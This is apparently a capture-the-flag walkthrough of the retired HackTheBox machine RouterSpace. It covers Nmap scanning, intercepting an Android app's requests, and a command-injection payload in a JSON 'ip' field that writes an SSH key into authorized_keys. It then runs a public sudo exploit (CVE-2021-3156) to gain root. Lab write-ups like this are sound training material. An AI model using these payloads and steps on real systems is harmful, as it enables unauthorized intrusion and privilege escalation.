Hackthebox Routerspace

RouterSpace is a Linux machine classified as easy difficulty. This machine has retired and been replaced by RedPanda.

Machine IP: 10.10.11.148

As always, I started by scanning the services and ports using Nmap.

Nmap scan report for 10.10.11.148
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-90404
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 76
|     ETag: W/"4c-kb4g2Jw5REaYxk9bZLPFwpFvGsE"
|     Date: Wed, 08 Jun 2022 03:27:29 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: c tO 1 9m 7u j M Xb 95 }
|   GetRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-91903
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Wed, 08 Jun 2022 03:27:28 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-56834
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Wed, 08 Jun 2022 03:27:28 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about

Upon accessing the website, I found a feature to download the RouterSpace.apk file.

routerspace

I installed the application on Anbox and set up an HTTP proxy to intercept requests using Burp Suite. (Reference: https://www.rootcat.de/blog/anbox_setup_may21/)

Note: The listener on Burp Suite must match the IP of Anbox.

$ adb install RouterSpace.apk
$ ifconfig anbox0
[REDACTED]
inet 192.168.250.1  netmask 255.255.255.0  broadcast 0.0.0.0
[REDACTED]
$ adb shell settings put global http_proxy 192.168.250.1:8080

I opened the application using anbox.appmgr and clicked “Check Status,” which intercepted a request in Burp Suite.

anbox

burpsuite

The request showed a host routerspace.htb, so I added this to my hosts file. I moved the request to Burp Suite’s Repeater for easy re-sending. Given the POST data, I tried command injection and received a response.

burpsuite-2

However, attempts to execute a reverse shell did not establish a connection back to my machine. Instead, I added my SSH public key to ~/.ssh/authorized_keys for user paul. The following request was used:

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 621
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate
{
  "ip":"0.0.0.0;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZ/Zpa7gQkeiA8Zy/yDhT8RE6Zz6A2gDuhykBiedvL6hwVbUXN00yhr+nCOvs3sw37gPyvZybU/fJeosLtInIEzseOALNmmFRwSmfPvgQBZ1Qt9I3C1L1tLRTLmtDUBEEpxClvqIpO9Au4kokHjgU9+DjhTp8JVRkCBPyoxuNnPfY3SnikRYp4oWFZWgC7/vT3/yV8L1Dek+441I1gFqSrO7VLpjC5Prtstu1uOU9jfXASBIwCHi4t82N08K0pI+StBbvtzCByMIXgC3MaT2vSameaZ/1QnNTVIpVNfCYegZCm6rUiRADHWuCWnBtEZ2A2PXJWID5lTd6F5tnXqDFRsWy7RpFqowX2frf1Bd4UKPfpGyXM2+i8BdAO/fOcNExEaNxFJgoAFcaaOBCasYg9aSnpPI4rO1WYL16LLESRiN3bAP8Dd+d3bJhCgNZqCHiiT7BkZxNEXB0ldI0XDHqv6R/KNvFiW+nWBPK9czpE0OH5mCk2bB90yBnEzlkVX6E= me@nowhere' > /home/paul/.ssh/authorized_keys"
}

I then logged in via SSH as user paul.

$ ssh paul@routerspace.htb
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
[REDACTED]
paul@routerspace:~$ cat user.txt
3497cba52fcb00f[REDACTED]

After gaining access as paul, I enumerated the system and found the sudo version.

paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

I used the exploit_nss.py script (https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py). Since the machine could not establish external connections, I transferred the file using SCP.

scp exploit_nss.py paul@routerspace.htb:/tmp

After transferring the file, I ran the exploit script and obtained a root shell.

paul@routerspace:~$ cd /tmp
paul@routerspace:/tmp$ python3 exploit_nss.py
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)
# cat /root/root.txt
65cf8e2bf6627026[REDACTED]

Rooted!